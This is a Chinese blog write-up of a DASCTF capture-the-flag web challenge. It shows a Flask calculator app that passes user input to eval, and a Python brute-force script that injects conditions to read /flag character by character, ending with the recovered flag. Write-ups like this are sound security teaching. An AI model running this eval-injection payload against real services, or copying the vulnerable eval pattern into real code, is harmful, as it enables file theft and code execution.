【web】-flask-简单的计算题(不简单)

已于 2024-07-20 17:15:49 修改
阅读量677 收藏 1
点赞数 19
分类专栏: ctf 文章标签: flask python 计算
于 2024-07-20 17:11:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mails2008/article/details/140574013
版权

打开页面是这样的

初步思路,打开F12,查看头,都发现了这个表达式的base64加密字符串。编写脚本提交答案,发现不对;

无奈点开source发现源代码,是flask,初始化表达式,获取提交的表达式,赋值新的表达式,没发现有什么问题,但是eval是个危险函数,前后端没有严格的过滤,这个可以利用,输入:(-497559)+(969608)+(-255632)+(587860)+(716596)  and 1==1 后提示Congratulations。source代码和实现代码如下


#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from flask import Flask, render_template, request,session
from config import create
import os

app = Flask(__name__)
app.config['SECRET_KEY'] = os.urandom(24)

## flag is in /flag try to get it

@app.route('/', methods=['GET', 'POST'])
def index():

    def filter(string):
        if "or" in string:
            return "hack"
        return string

    if request.method == 'POST':
        input = request.form['input']
        create_question = create()
        input_question = session.get('question')
        session['question'] = create_question
        if input_question==None:
            return render_template('index.html', answer="Invalid session please try again!", question=create_question)
        if filter(input)=="hack":
            return render_template('index.html', answer="hack", question=create_question)
        try:
            calc_result = str((eval(input_question + "=" + str(input))))
            if calc_result == 'True':
                result = "Congratulations"
            elif calc_result == 'False':
                result = "Error"
            else:
                result = "Invalid"
        except:
            result = "Invalid"
        return render_template('index.html', answer=result,question=create_question)

    if request.method == 'GET':
        create_question = create()
        session['question'] = create_question
        return render_template('index.html',question=create_question)

@app.route('/source')
def source():
        return open("app.py", "r").read()

if __name__ == '__main__':
    app.run(host="0.0.0.0", debug=False)

import requests
import re

def main():
    alphabet = ['{','}', '@', '_',',','a','b','c','d','e','f','j','h','i','g','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','G','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7','8','9']
    url='ip'
    data={"input":""}
    s = requests.Session()
    flag = ''
    for i in range(0,100):
        for char in alphabet:
            try:
                r = s.get(url)
                question = re.search(r"<h4>(.*)</h4>", r.text.decode(), re.M|re.I).group().replace("<h4>", "").replace("</h4>","")[:-1]
                data["input"] = "{0} and '{2}'==(open('/flag','r').read()[{1}])".format(question, i, char)
                r = s.post(url, data=data)
                result = r.content.decode()
                if r"Congratulations" in result:
                    flag += char
                    print(flag)
                    break
            except Exception as e:
                print("Exception: ", end='')
                print(e)
if __name__ == '__main__':
    main()

运行后得到flag : DASCTF{53a6ee70a3e8c013e2b1dbb2b926d3b2}

少多慢快
关注
专栏目录
安恒赛php_DASCTF6月赛
weixin_40007541的博客
12-21 325
因为和第五空间连着,然后昨天下午又去打了一场AWD,感觉身体掏空,就认真打了DASCTF(咕咕咕),剩下的题目等有机会再复现简单计算器-1考点:python eval()代码注入,命令执行结果外带访问Source可以看到源码:#!/usr/bin/env python3# -*- coding: utf-8 -*-from flask import Flask, render_template,...
python flask面试题_Flask面试题
weixin_36189159的博客
01-28 2598
什么是Flask,有什么优点?轻量级web框架,默认依赖两个外部库:jinja2和Werkzeug WSGI工具适用于做小型网站以及web服务的API如何在Flask中访问会话?会话(seesion)会话数据存储在服务器上,需要存储在服务器上的临时目录中from flask import session导入会话对象session['name'] = 'admin'给会话添加变量session.po...
DASCTF六月团队赛(2020)-部分WP
~airrudder~
06-27 4332
本篇内容 MISC: Keyboard 透明度 Crypto: Gemini_Man Web简单计算题1 简单计算题2 phpuns Reverse: easy_maze 上一篇 | 目录 | 下一篇 刚打了DASCTF六月团队赛,情况虽不是很理想,但也记录一下团队解题情况。 Keyboard 尝试了很久发现没思路,搜索一下,发现是安恒DASCTF 四月战原题,甚至连flag都没变。 //查找含“keyboard”的文件 volatility -f Keyboard.raw .
安恒六月赛DASCTFweb1,2)
weixin_43610673的博客
06-26 1753
简单计算题-1 #!/usr/bin/env python3 # -*- coding: utf-8 -*- from flask import Flask, render_template, request,session from config import black_list,create import os app = Flask(__name__) app.config['SECRET_KEY'] = os.urandom(24) ## flag is in /flag try to ge
Python中eval()和input()的用法浅析
热门推荐
江湖人称星爷
07-30 3万+
1. eval定义 eval(expression, globals=None, locals=None) expression:该参数是一个字符串,python会使用globals字典和locals字典作为全局和局部的命名空间,将expression当做一个python表达式进行解析和计算。 globals:该参数管控的是一个全局的命名空间,也就是我们在计算表达式的时候可以使用全局的命名空...
[BUUCTF]从web题学习Python3f-string格式化字符串漏洞与eval注入
Y4tacker的博客
10-21 3137
前言: 前几天刚刚在网上看到p师傅分享的python的f文章目录代码审计利用姿势参考链接 代码审计 然后看到有个source,点开看到一堆源码,关于什么是cgi下面有个菜鸟的链接可以看看 #!/usr/bin/env python3 import cgi; import sys from html import escape FLAG = open('/var/www/flag','r').read() OK_200 = """Content-type: text/html <link rel
Windows 10 - Flask 框架 学习总结 1
Muxiu
07-15 1629
目录环境配置安装安装 Virtualenv 虚拟环境Virtualenv 虚拟环境内安装 Flask 框架Flask 框架的初级学习运行 Flask 的最小应用(app)解决 Warning 报错,开启 WSGI 服务 环境配置安装 安装 Virtualenv 虚拟环境 使用 python 的框架,一般最好是弄一个虚拟环境,在虚拟环境内使用框架,这样比较方便后面的项目封装打包,而且可以对该项目运行环境与其他的项目的运行环境进行一个隔离,不会导致版本的冲突。 具体的看创建虚拟环境实操链接 Virtualenv
python-flask计算机毕业设计中文在线学习网站(程序+开题+论文)
小齐学长_计算机毕设
08-11 862
该网站旨在打破地域界限,通过整合丰富的视频教学资源、灵活的听写练习、多样化的课程类型以及庞大的题库信息,为全球中文爱好者提供一个全方位、立体化的学习平台,促进中文教育的普及与深化。本研究的意义在于,一方面,它能够极大地拓宽中文学习的渠道,使学习者能够根据自己的兴趣、水平和时间安排自主选择学习内容,提高学习效率和学习效果。另一方面,通过引入先进的在线教育技术和理念,如智能推荐系统、个性化学习路径规划等,能够更精准地满足学习者的个性化需求,激发其学习动力,促进中文学习的深入与持久。
最常见的-35-个-Python-面试题及答案.docx
06-13
然而,由于全局解释器锁(GIL),Python的多线程在CPU密集型任务上并不能实现真正的并行计算,但在IO密集型任务中可以提高效率。 6. **继承**: - **继承**是面向对象编程的关键概念,允许子类继承父类的属性和...
Python-关于python的面试题
08-10
- 第三方库:如Numpy用于科学计算,Pandas用于数据分析,Django和Flask用于Web开发。 熟悉以上知识点对于理解和解答Python面试题至关重要。在实际面试中,面试官可能会结合实际项目经验、问题解决能力以及对Python...
基于python+flask实现简单的考试系统源码.zip
05-03
FlaskPython的一个Web服务框架,它不包含数据库、表单验证等复杂功能,但可以通过扩展轻松添加这些功能。Flask的核心包括一个轻量级的WSGI服务器和一个URL路由系统。开发者可以通过定义路由规则,将URL映射到特定...
web安全-SSTI模板注入漏洞
weixin_61956136的博客
07-31 3760
web安全-SSTI模板注入漏洞
软件测试学习笔记丨Flask操作数据库-ORM
ceshiren_com的博客
11-01 705
是把数据保存到可永久保存的存储设备中(比如磁盘)。持久化的主要应用是将内存中的数据存储在关系型数据库中,当然也可以存储在磁盘文件中、xml数据文件中等。
flask websocket服务搭建,flask-sock 和 flask-socketio
stephen147的博客
11-01 256
socket是网络上运行的两个程序之间的双向通信链路的一个端点。这是一个非常低级的东西,其他一切都是在 TCP 套接字之上实现的。WebSocket 是 Web 的标准通信协议。它允许在客户端和服务器之间建立全双工通信通道。Socket.IO 是一种构建的通信协议,提供自动重新连接、基于事件的通知等额外功能。Flask-SocketIO 是 Socket.IO 服务器端协议的实现,作为 Flask 扩展。两个主流框架flask-sock 和 flask-socketio。
软件测试学习笔记丨Flask操作数据库-数据库和表的管理
最新发布
ceshiren_com的博客
11-01 485
【代码】软件测试学习笔记丨Flask操作数据库-数据库和表的管理。
PythonWeb开发】Flask-RESTful字段格式化
qq_39780701的博客
10-28 524
字段格式化的意思就是对api接口返回的响应做出规范。
使用 Elastic、OpenLLMetry 和 OpenTelemetry 跟踪 LangChain 应用程序
Elastic 中国社区官方博客
10-31 847
Langchain 应用程序的使用正在增长。构建基于 RAG 的应用程序、简单的 AI 助手等的能力正在成为常态。观察这些应用程序更加困难。考虑到现有的各种选项,本博客展示了如何将 OpenTelemetry 检测与 OpenLLMetry 结合使用并将其导入 Elastic Observability APM。LangChain 已迅速成为 AI 开发领域的关键框架,特别是用于构建由大型语言模型 (LLM) 支持的应用程序。随着开发人员对其的采用率飙升,对有效调试和性能优化工具的需求也变得越来越明显。
Flask】四、flask连接并操作数据库
naihe_fish的博客
10-28 547
Flask-SQLAlchemy中,模型是数据库表的Python类,每个模型类代表数据库中的一张表。
使用 Flask 实现简单的登录注册功能
m0_65544927的博客
10-25 1349
本文介绍了如何使用 Flask 框架构建一个简单的用户登录和注册系统。首先,介绍了环境准备和数据库设置,包括使用 MySQL 创建数据库和用户表。接着,详细讲解了 Flask 应用的基本配置,特别是数据库连接的配置。 在实现部分,文章分别提供了用户注册和登录的路由代码,展示了如何处理表单输入、检查用户名是否已存在、密码的哈希处理,以及如何将新用户信息插入到数据库中。此外,还包含了如何验证用户登录信息,并在成功登录后重定向至主页的功能。 最后,文章还提供了简单的前端页面示例,帮助读者理解如何与后端进行交互
Python课后习题解析-20180305
- **Web应用开发**:例如使用Django、Flask等框架构建网站。 - **服务器运维自动化**:通过编写脚本管理服务器任务,如 Ansible。 - **科学计算**:如使用NumPy、Pandas和Matplotlib进行数据分析和可视化。 - **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值